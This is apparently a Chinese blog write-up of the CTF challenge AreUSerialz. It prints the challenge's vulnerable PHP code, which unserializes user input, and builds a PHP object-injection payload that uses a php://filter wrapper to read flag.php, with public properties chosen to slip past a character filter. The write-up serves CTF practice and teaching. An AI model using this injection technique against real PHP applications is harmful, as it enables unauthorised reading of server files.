• [网鼎杯 2020 青龙组]AreUSerialz

    直接得到代码

    1.  
    2.  
    3. include("flag.php");
    4.  
    5. highlight_file(__FILE__);
    6.  
    7. class FileHandler {
    8.  
    9.     protected $op;
    10.     protected $filename;
    11.     protected $content;
    12.  
    13.     function __construct() {
    14.         $op = "1";
    15.         $filename = "/tmp/tmpfile";
    16.         $content = "Hello World!";
    17.         $this->process();
    18.     }
    19.  
    20.     public function process() {
    21.         if($this->op == "1") {
    22.             $this->write();
    23.         } else if($this->op == "2") {
    24.             $res = $this->read();
    25.             $this->output($res);
    26.         } else {
    27.             $this->output("Bad Hacker!");
    28.         }
    29.     }
    30.  
    31.     private function write() {
    32.         if(isset($this->filename) && isset($this->content)) {
    33.             if(strlen((string)$this->content) > 100) {
    34.                 $this->output("Too long!");
    35.                 die();
    36.             }
    37.             $res = file_put_contents($this->filename, $this->content);
    38.             if($res) $this->output("Successful!");
    39.             else $this->output("Failed!");
    40.         } else {
    41.             $this->output("Failed!");
    42.         }
    43.     }
    44.  
    45.     private function read() {
    46.         $res = "";
    47.         if(isset($this->filename)) {
    48.             $res = file_get_contents($this->filename);
    49.         }
    50.         return $res;
    51.     }
    52.  
    53.     private function output($s) {
    54.         echo "[Result]: 
      "      ;
    55.         echo $s;
    56.     }
    57.  
    58.     function __destruct() {
    59.         if($this->op === "2")
    60.             $this->op = "1";
    61.         $this->content = "";
    62.         $this->process();
    63.     }
    64.  
    65. }
    66.  
    67. function is_valid($s) {
    68.     for($i = 0; $i < strlen($s); $i++)
    69.         if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
    70.             return false;
    71.     return true;
    72. }
    73.  
    74. if(isset($_GET{'str'})) {
    75.  
    76.     $str = (string)$_GET['str'];
    77.     if(is_valid($str)) {
    78.         $obj = unserialize($str);
    79.     }
    80.  
    81. }

    发现函数is_valid,里面的ord函数

    说明这里get传入的str值的ASCII码值在32-125之间

    再看

    这里的对于op的强类型判断等于2,我们直接让op等于数字2即可绕过,然后调用process方法

    再看process方法:

    这里对于op又是弱类型比较,当op等于2时,调用read方法

    再看read方法

    很明显,这里有file_get_contents方法,可以被我们利用

    开始构造payload

    2. class FileHandler {
    3.     protected $op = 2;
    4.     protected $filename = 'php://filter/convert.base64-encode/resource=flag.php';
    5.     protected $content = 123;
    6. }
    7. echo serialize(new FileHandler);

    因为这里的成员都是protected类型,直接打印会出现不可见字符,所以需要url编码

    但是,前面还说到了ASCII码的要求,这里的不可见字符其实是\x00,它的ASCII为0

    知识点:PHP7.1以上版本对属性类型不敏感,public属性序列化不会出现不可见字符,可以用public属性来绕过

    修改payload为:

    2. class FileHandler {
    3.     public $op = 2;
    4.     public $filename = 'php://filter/convert.base64-encode/resource=flag.php';
    5.     public $content = 123;
    6. }
    7. echo serialize(new FileHandler);

    然后将得到的内容进行base64解码即可得到flag

  • 相关阅读:
    数据读写:Python读写CSV文件
    C++中map和set的区别
    jquery.cookie.min.js 1.4.1版本
    基于C#的房屋租赁管理系统设计与实现
    分布式系统关注点:“熔断”以及最佳实践方法
    SSM项目【Spring MVC、MyBatis、Spring】传智健康项目,关于检查项页面问题
    C#根据DataTable中的不同值为asp:DataGrid中的不同行或单元格设置不同的颜色
    【opencv图像处理】--1. 图像,视频,鼠标,trackbar控件简单使用
    互联网上门洗衣洗鞋店小程序开发;
    springboot2.x版本集成redis说明(lettuce、redisson)
  • 原文地址:https://blog.csdn.net/Yb_140/article/details/126787425